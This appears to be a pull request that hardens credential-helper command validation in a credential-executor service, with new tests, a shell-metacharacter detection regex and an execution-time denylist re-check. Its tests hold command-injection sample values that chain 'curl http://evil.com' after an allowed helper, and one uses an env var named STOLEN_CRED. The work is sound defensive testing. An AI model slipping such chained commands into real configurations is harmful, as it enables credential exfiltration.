### PR TITLE
fix: harden helperCommand validation (escaped spaces, executor re-check, metachar rejection)

### DIFF
--- a/credential-executor/src/__tests__/command-executor.test.ts
+++ b/credential-executor/src/__tests__/command-executor.test.ts
@@ -1552,3 +1552,136 @@ describe("executeAuthenticatedCommand — integration: managed OAuth", () => {
     expect(result.stdout?.trim()).toBe("platform-managed-token-xyz");
   });
 });
+
+// ---------------------------------------------------------------------------
+// Defense-in-depth: helperCommand denied binary re-check at execution time
+// ---------------------------------------------------------------------------
+
+describe("executeAuthenticatedCommand — credential_process defense-in-depth", () => {
+  test("rejects helperCommand with denied binary at execution time", async () => {
+    // Simulate a tampered manifest where helperCommand points to a denied binary.
+    // The validator would normally catch this, but the executor should independently
+    // re-check as defense-in-depth.
+    const manifest = buildManifest({
+      egressMode: EgressMode.NoNetwork,
+      authAdapter: {
+        type: AuthAdapterType.CredentialProcess,
+        helperCommand: "curl http://evil.com",
+        envVarName: "STOLEN_CRED",
+      },
+      commandProfiles: {
+        "list": {
+          description: "List resources",
+          allowedArgvPatterns: [
+            {
+              name: "list-all",
+              tokens: ["list", "--format", "<format>"],
+            },
+          ],
+          deniedSubcommands: [],
+        },
+      },
+    });
+
+    // Publish the bundle by directly writing the manifest to bypass the validator.
+    // We need to simulate a scenario where a tampered manifest somehow got published.
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "should not run"\n',
+    );
+
+    // Patch the published manifest to contain the denied helperCommand
+    const toolstoreDir = getCesToolStoreDir("local");
+    const manifestPath = getBundleManifestPath(toolstoreDir, digest);
+    const publishedManifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+    publishedManifest.secureCommandManifest.authAdapter.helperCommand = "curl http://evil.com";
+    writeFileSync(manifestPath, JSON.stringify(publishedManifest));
+
+    const deps = buildDeps({
+      materializeCredential: successMaterializer("secret-value"),
+    });
+    addCommandGrant(
+      deps.persistentStore,
+      "local_static:test/api_key",
+      digest,
+      "list",
+    );
+
+    const request: ExecuteCommandRequest = {
+      bundleDigest: digest,
+      profileName: "list",
+      credentialHandle: "local_static:test/api_key",
+      argv: ["list", "--format", "json"],
+      workspaceDir: testWorkspaceDir,
+      purpose: "Test defense-in-depth denied binary re-check",
+    };
+
+    const result = await executeAuthenticatedCommand(request, deps);
+
+    expect(result.success).toBe(false);
+    expect(result.error).toContain("denied binary");
+    expect(result.error).toContain("curl");
+  });
+
+  test("rejects helperCommand with shell metacharacters at execution time", async () => {
+    const manifest = buildManifest({
+      egressMode: EgressMode.NoNetwork,
+      authAdapter: {
+        type: AuthAdapterType.CredentialProcess,
+        helperCommand: "aws-vault exec default; curl http://evil.com",
+        envVarName: "STOLEN_CRED",
+      },
+      commandProfiles: {
+        "list": {
+          description: "List resources",
+          allowedArgvPatterns: [
+            {
+              name: "list-all",
+              tokens: ["list", "--format", "<format>"],
+            },
+          ],
+          deniedSubcommands: [],
+        },
+      },
+    });
+
+    const { digest } = publishTestBundle(
+      manifest,
+      "local",
+      '#!/bin/sh\necho "should not run"\n',
+    );
+
+    // Patch the published manifest to contain shell metacharacters
+    const toolstoreDir = getCesToolStoreDir("local");
+    const manifestPath = getBundleManifestPath(toolstoreDir, digest);
+    const publishedManifest = JSON.parse(readFileSync(manifestPath, "utf-8"));
+    publishedManifest.secureCommandManifest.authAdapter.helperCommand =
+      "aws-vault exec default; curl http://evil.com";
+    writeFileSync(manifestPath, JSON.stringify(publishedManifest));
+
+    const deps = buildDeps({
+      materializeCredential: successMaterializer("secret-value"),
+    });
+    addCommandGrant(
+      deps.persistentStore,
+      "local_static:test/api_key",
+      digest,
+      "list",
+    );
+
+    const request: ExecuteCommandRequest = {
+      bundleDigest: digest,
+      profileName: "list",
+      credentialHandle: "local_static:test/api_key",
+      argv: ["list", "--format", "json"],
+      workspaceDir: testWorkspaceDir,
+      purpose: "Test defense-in-depth metacharacter rejection",
+    };
+
+    const result = await executeAuthenticatedCommand(request, deps);
+
+    expect(result.success).toBe(false);
+    expect(result.error).toContain("shell metacharacters");
+  });
+});

--- a/credential-executor/src/__tests__/command-validator.test.ts
+++ b/credential-executor/src/__tests__/command-validator.test.ts
@@ -12,6 +12,7 @@ import {
   validateCommand,
   matchesArgvPattern,
   extractShellBinary,
+  containsShellMetacharacters,
 } from "../commands/validator.js";
 
 // ---------------------------------------------------------------------------
@@ -984,5 +985,187 @@ describe("DENIED_BINARIES set", () => {
     ]) {
       expect(DENIED_BINARIES.has(binary)).toBe(true);
     }
+  });
+});
+
+// ---------------------------------------------------------------------------
+// extractShellBinary: backslash-escaped spaces in env assignments
+// ---------------------------------------------------------------------------
+
+describe("extractShellBinary — escaped spaces in env assignments", () => {
+  test("handles backslash-escaped space in bare env value", () => {
+    // AWS_PROFILE=prod\ account curl ... should parse as binary "curl",
+    // not "account" (the escaped space is part of the value).
+    expect(extractShellBinary("AWS_PROFILE=prod\\ account curl https://example.com")).toBe("curl");
+  });
+
+  test("handles multiple backslash-escaped spaces in bare env value", () => {
+    expect(extractShellBinary("FOO=a\\ b\\ c curl https://example.com")).toBe("curl");
+  });
+
+  test("handles backslash-escaped character in bare env value (no space)", () => {
+    expect(extractShellBinary("FOO=bar\\nbaz curl https://example.com")).toBe("curl");
+  });
+
+  test("still works with unescaped bare values", () => {
+    expect(extractShellBinary("AWS_PROFILE=prod curl https://example.com")).toBe("curl");
+  });
+});
+
+// ---------------------------------------------------------------------------
+// containsShellMetacharacters
+// ---------------------------------------------------------------------------
+
+describe("containsShellMetacharacters", () => {
+  test("detects semicolon", () => {
+    expect(containsShellMetacharacters("aws-vault exec; curl http://evil.com")).toBe(true);
+  });
+
+  test("detects &&", () => {
+    expect(containsShellMetacharacters("aws-vault exec && curl http://evil.com")).toBe(true);
+  });
+
+  test("detects ||", () => {
+    expect(containsShellMetacharacters("aws-vault exec || curl http://evil.com")).toBe(true);
+  });
+
+  test("detects single pipe", () => {
+    expect(containsShellMetacharacters("aws-vault exec | curl http://evil.com")).toBe(true);
+  });
+
+  test("detects $() command substitution", () => {
+    expect(containsShellMetacharacters("aws-vault exec $(curl http://evil.com)")).toBe(true);
+  });
+
+  test("detects backtick command substitution", () => {
+    expect(containsShellMetacharacters("aws-vault exec `curl http://evil.com`")).toBe(true);
+  });
+
+  test("allows clean commands without metacharacters", () => {
+    expect(containsShellMetacharacters("aws-vault exec default --json")).toBe(false);
+  });
+
+  test("allows flags with dashes and equals", () => {
+    expect(containsShellMetacharacters("/usr/local/bin/aws-vault exec prod --format=json")).toBe(false);
+  });
+
+  test("allows env var assignments", () => {
+    expect(containsShellMetacharacters("AWS_PROFILE=prod aws-vault exec default")).toBe(false);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// helperCommand shell metacharacter rejection (manifest validation)
+// ---------------------------------------------------------------------------
+
+describe("helperCommand shell metacharacter rejection", () => {
+  test("rejects helperCommand with semicolon chaining", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default; curl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+
+  test("rejects helperCommand with && chaining", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default && curl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+
+  test("rejects helperCommand with || chaining", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default || curl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+
+  test("rejects helperCommand with pipe", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default | curl http://evil.com",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+
+  test("rejects helperCommand with $() subshell", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec $(curl http://evil.com)",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+
+  test("rejects helperCommand with backtick subshell", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec `curl http://evil.com`",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.errors.some((e) => e.includes("shell metacharacters")),
+    ).toBe(true);
+  });
+
+  test("accepts clean helperCommand without metacharacters", () => {
+    const result = validateManifest(
+      buildManifest({
+        authAdapter: {
+          type: AuthAdapterType.CredentialProcess,
+          helperCommand: "aws-vault exec default --json",
+          envVarName: "AWS_CREDENTIALS",
+        },
+      }),
+    );
+    expect(result.valid).toBe(true);
+    expect(result.errors).toHaveLength(0);
   });
 });

--- a/credential-executor/src/commands/executor.ts
+++ b/credential-executor/src/commands/executor.ts
@@ -62,7 +62,7 @@ import { readPublishedManifest, getBundleContentPath, isBundlePublished } from "
 import { getCesToolStoreDir, type CesMode } from "../paths.js";
 import type { SecureCommandManifest, CommandProfile } from "./profiles.js";
 import { isDeniedBinary, EgressMode } from "./profiles.js";
-import { validateCommand, type CommandValidationResult } from "./validator.js";
+import { validateCommand, extractShellBinary, containsShellMetacharacters, type CommandValidationResult } from "./validator.js";
 import type { AuthAdapterConfig } from "./auth-adapters.js";
 import { AuthAdapterType, validateAuthAdapterConfig } from "./auth-adapters.js";
 import {
@@ -845,6 +845,26 @@ async function runCredentialProcess(
   proxyEnv?: ProxyEnvVars,
   noNetworkEnv?: Record<string, string>,
 ): Promise<{ ok: true; stdout: string } | { ok: false; error: string }> {
+  // Defense-in-depth: re-check denied binary and metacharacters at execution
+  // time, mirroring the validator's static checks. If a manifest was tampered
+  // with after validation, this blocks execution before spawning the shell.
+  if (containsShellMetacharacters(helperCommand)) {
+    return {
+      ok: false,
+      error: `Credential process helperCommand contains shell metacharacters. ` +
+        `Command chaining operators are not allowed.`,
+    };
+  }
+
+  const helperBinary = extractShellBinary(helperCommand);
+  if (isDeniedBinary(helperBinary)) {
+    return {
+      ok: false,
+      error: `Credential process helperCommand starts with denied binary "${helperBinary}". ` +
+        `Generic HTTP clients, interpreters, and shell trampolines cannot be used as credential helpers.`,
+    };
+  }
+
   try {
     // Build a minimal environment for the helper. No host env is inherited,
     // but egress proxy or no-network env vars are injected so the helper

--- a/credential-executor/src/commands/validator.ts
+++ b/credential-executor/src/commands/validator.ts
@@ -123,6 +123,18 @@ export function validateManifest(
     if (manifest.authAdapter.type === AuthAdapterType.CredentialProcess) {
       const helper = manifest.authAdapter.helperCommand;
       if (helper && helper.trim().length > 0) {
+        // Reject shell metacharacters that could chain a denied binary
+        // after an allowed one (e.g. "aws-vault exec ; curl ...").
+        // Since helperCommand is executed via `sh -c`, these operators
+        // allow arbitrary command chaining that bypasses the denylist.
+        if (containsShellMetacharacters(helper)) {
+          errors.push(
+            `authAdapter: credential_process helperCommand contains shell metacharacters. ` +
+              `Command chaining operators (;, &&, ||, |) and subshell expansion ($()) ` +
+              `are not allowed in helperCommand because they can bypass the denied binary check.`,
+          );
+        }
+
         const firstWord = extractShellBinary(helper);
         const basename = pathBasename(firstWord);
         if (isDeniedBinary(firstWord)) {
@@ -425,6 +437,34 @@ function validateArgvPattern(
 }
 
 // ---------------------------------------------------------------------------
+// Shell metacharacter detection (for helperCommand safety)
+// ---------------------------------------------------------------------------
+
+/**
+ * Shell metacharacters that enable command chaining or subshell expansion.
+ * Since helperCommand is executed via `sh -c`, these operators allow an
+ * attacker to chain a denied binary after an allowed one, bypassing the
+ * denylist check on the first token.
+ *
+ * Detected patterns:
+ * - `;`  — command separator
+ * - `&&` — logical AND
+ * - `||` — logical OR
+ * - `|`  — pipe (but not `||`)
+ * - `$(`  — command substitution
+ * - `` ` `` — backtick command substitution
+ */
+const SHELL_METACHAR_RE = /;|&&|\|\||(?<!\|)\|(?!\|)|\$\(|`/;
+
+/**
+ * Returns true if the command string contains shell metacharacters that
+ * could be used for command chaining or subshell expansion.
+ */
+export function containsShellMetacharacters(command: string): boolean {
+  return SHELL_METACHAR_RE.test(command);
+}
+
+// ---------------------------------------------------------------------------
 // Shell binary extraction (for helperCommand denylist checks)
 // ---------------------------------------------------------------------------
 
@@ -433,7 +473,7 @@ function validateArgvPattern(
  * command. These are environment overrides and not the binary. Handles
  * bare values, single-quoted values, and double-quoted values.
  */
-const ENV_ASSIGNMENT_RE = /^[A-Za-z_][A-Za-z0-9_]*=(?:'[^']*'|"[^"]*"|\S*)\s+/;
+const ENV_ASSIGNMENT_RE = /^[A-Za-z_][A-Za-z0-9_]*=(?:'[^']*'|"[^"]*"|(?:\\.|[^\s])*)\s+/;
 
 /**
  * Extract the actual binary name from a shell command string, accounting for


### PR DESCRIPTION
Addresses review feedback from PR #17205. Three fixes: (1) handle backslash-escaped spaces in env var assignments in extractShellBinary regex, (2) add defense-in-depth denied binary re-check at helperCommand execution time, (3) reject helperCommands containing shell metacharacters (;, &&, ||, |, $()) to prevent denylist bypass via command chaining.
<!-- devin-review-badge-begin -->

---

<a href="https://app.devin.ai/review/vellum-ai/vellum-assistant/pull/17214" target="_blank">
  <picture>
    <source media="(prefers-color-scheme: dark)" srcset="https://static.devin.ai/assets/gh-open-in-devin-review-dark.svg?v=1">
    <img src="https://static.devin.ai/assets/gh-open-in-devin-review-light.svg?v=1" alt="Open with Devin">
  </picture>
</a>
<!-- devin-review-badge-end -->
